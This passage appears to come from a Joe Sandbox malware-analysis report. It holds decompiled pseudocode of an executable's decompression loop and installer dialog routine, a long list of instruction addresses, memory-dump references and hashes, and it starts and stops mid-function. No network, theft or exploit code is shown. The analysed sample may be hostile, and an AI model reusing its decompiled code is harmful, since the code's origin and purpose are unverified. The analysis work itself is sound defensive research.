								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                          0x00000000
                                                          0x00406956
                                                          0x00406956
                                                          0x0040695b
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00407038
                                                          0x00407038
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407013
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x00000000
                                                          0x004071c6
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00000000
                                                          0x00407035
                                                          0x0040695d
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00000000
                                                          0x00406b8e
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a1a
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406aca
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406aa3
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x004071dc
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x004071f4
                                                          0x004071f8
                                                          0x004071f8
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00000000
                                                          0x00406a11
                                                          0x00406a9d
                                                          0x004069a6
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00000000
                                                          0x00406d2e
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00000000
                                                          0x00406fbf
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x00000000
                                                          0x00407132
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406f85
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                          • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                          • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                          • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 193 403d2c-403d35 191->193 194 403eb9-403ece 192->194 195 403e6c-403ea7 GetDlgItem * 2 call 4041e1 KiUserCallbackDispatcher call 40140b 192->195 198 403d37-403d44 SetWindowPos 193->198 199 403d4a-403d4d 193->199 196 403ed0-403ed3 194->196 197 403f0e-403f13 call 40422d 194->197 215 403eac-403eb4 195->215 201 403ed5-403ee0 call 401389 196->201 202 403f06-403f08 196->202 209 403f18-403f33 197->209 198->199 204 403d67-403d6d 199->204 205 403d4f-403d61 ShowWindow 199->205 201->202 223 403ee2-403f01 SendMessageW 201->223 202->197 208 4041ae 202->208 210 403d89-403d8c 204->210 211 403d6f-403d84 DestroyWindow 204->211 205->204 213 4041b0-4041b7 208->213 219 403f35-403f37 call 40140b 209->219 220 403f3c-403f42 209->220 216 403d8e-403d9a SetWindowLongW 210->216 217 403d9f-403da5 210->217 214 40418b-404191 211->214 214->208 225 404193-404199 214->225 215->194 216->213 221 403e48-403e56 call 404248 217->221 222 403dab-403dbc GetDlgItem 217->222 219->220 226 403f48-403f53 220->226 227 40416c-404185 DestroyWindow EndDialog 220->227 221->213 228 403ddb-403dde 222->228 229 403dbe-403dd5 SendMessageW IsWindowEnabled 222->229 223->213 225->208 231 40419b-4041a4 ShowWindow 225->231 226->227 232 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 226->232 227->214 234 403de0-403de1 228->234 235 403de3-403de6 228->235 229->208 229->228 231->208 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 232->260 261 403fa8-403fad 232->261 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->221 244 403e2f-403e42 SendMessageW 239->244 245 403dfb-403e01 239->245 243 403df0-403df2 240->243 240->244 243->238 244->221 248 403e03-403e09 call 40140b 245->248 249 403e18-403e21 call 40140b 245->249 258 403e0f 248->258 249->221 257 403e23-403e2d 249->257 257->258 258->238 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->209 280 404081-404083 269->280 280->209 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->214 284 4040c6-4040f3 CreateDialogParamW 282->284 283->208 285 40409b-4040a1 283->285 284->214 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->287 285->209 286 4040a7 285->286 286->208 287->208 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->214
                                                          C-Code - Quality: 83%
                                                          			E00403D08(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x4236d0 = _t37;
					if(_t118 == 0x110) {
						 *0x42a208 = _t128;
						 *0x4236e4 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216b0 = _t94;
						E004041E1(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x4291e8); // executed
						 *0x4291cc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x4236d0 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a240;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E0040422D(0x40b);
						while(1) {
							_t39 =  *0x4236d0;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x42a244;
							if(_t41 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291cc - _t136;
							if( *0x4291cc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040626E(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041E1(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ac - _t136;
							_v32 = _t51;
							if( *0x42a2ac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404203(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216b0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x4236e4);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216b0);
							}
							E00404216();
							E0040624C(0x4236e8, E00403CE9());
							E0040626E(0x4236e8, _t128, _t133,  &(0x4236e8[lstrlenW(0x4236e8)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x4236e8); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291d8); // executed
									 *0x4226c0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
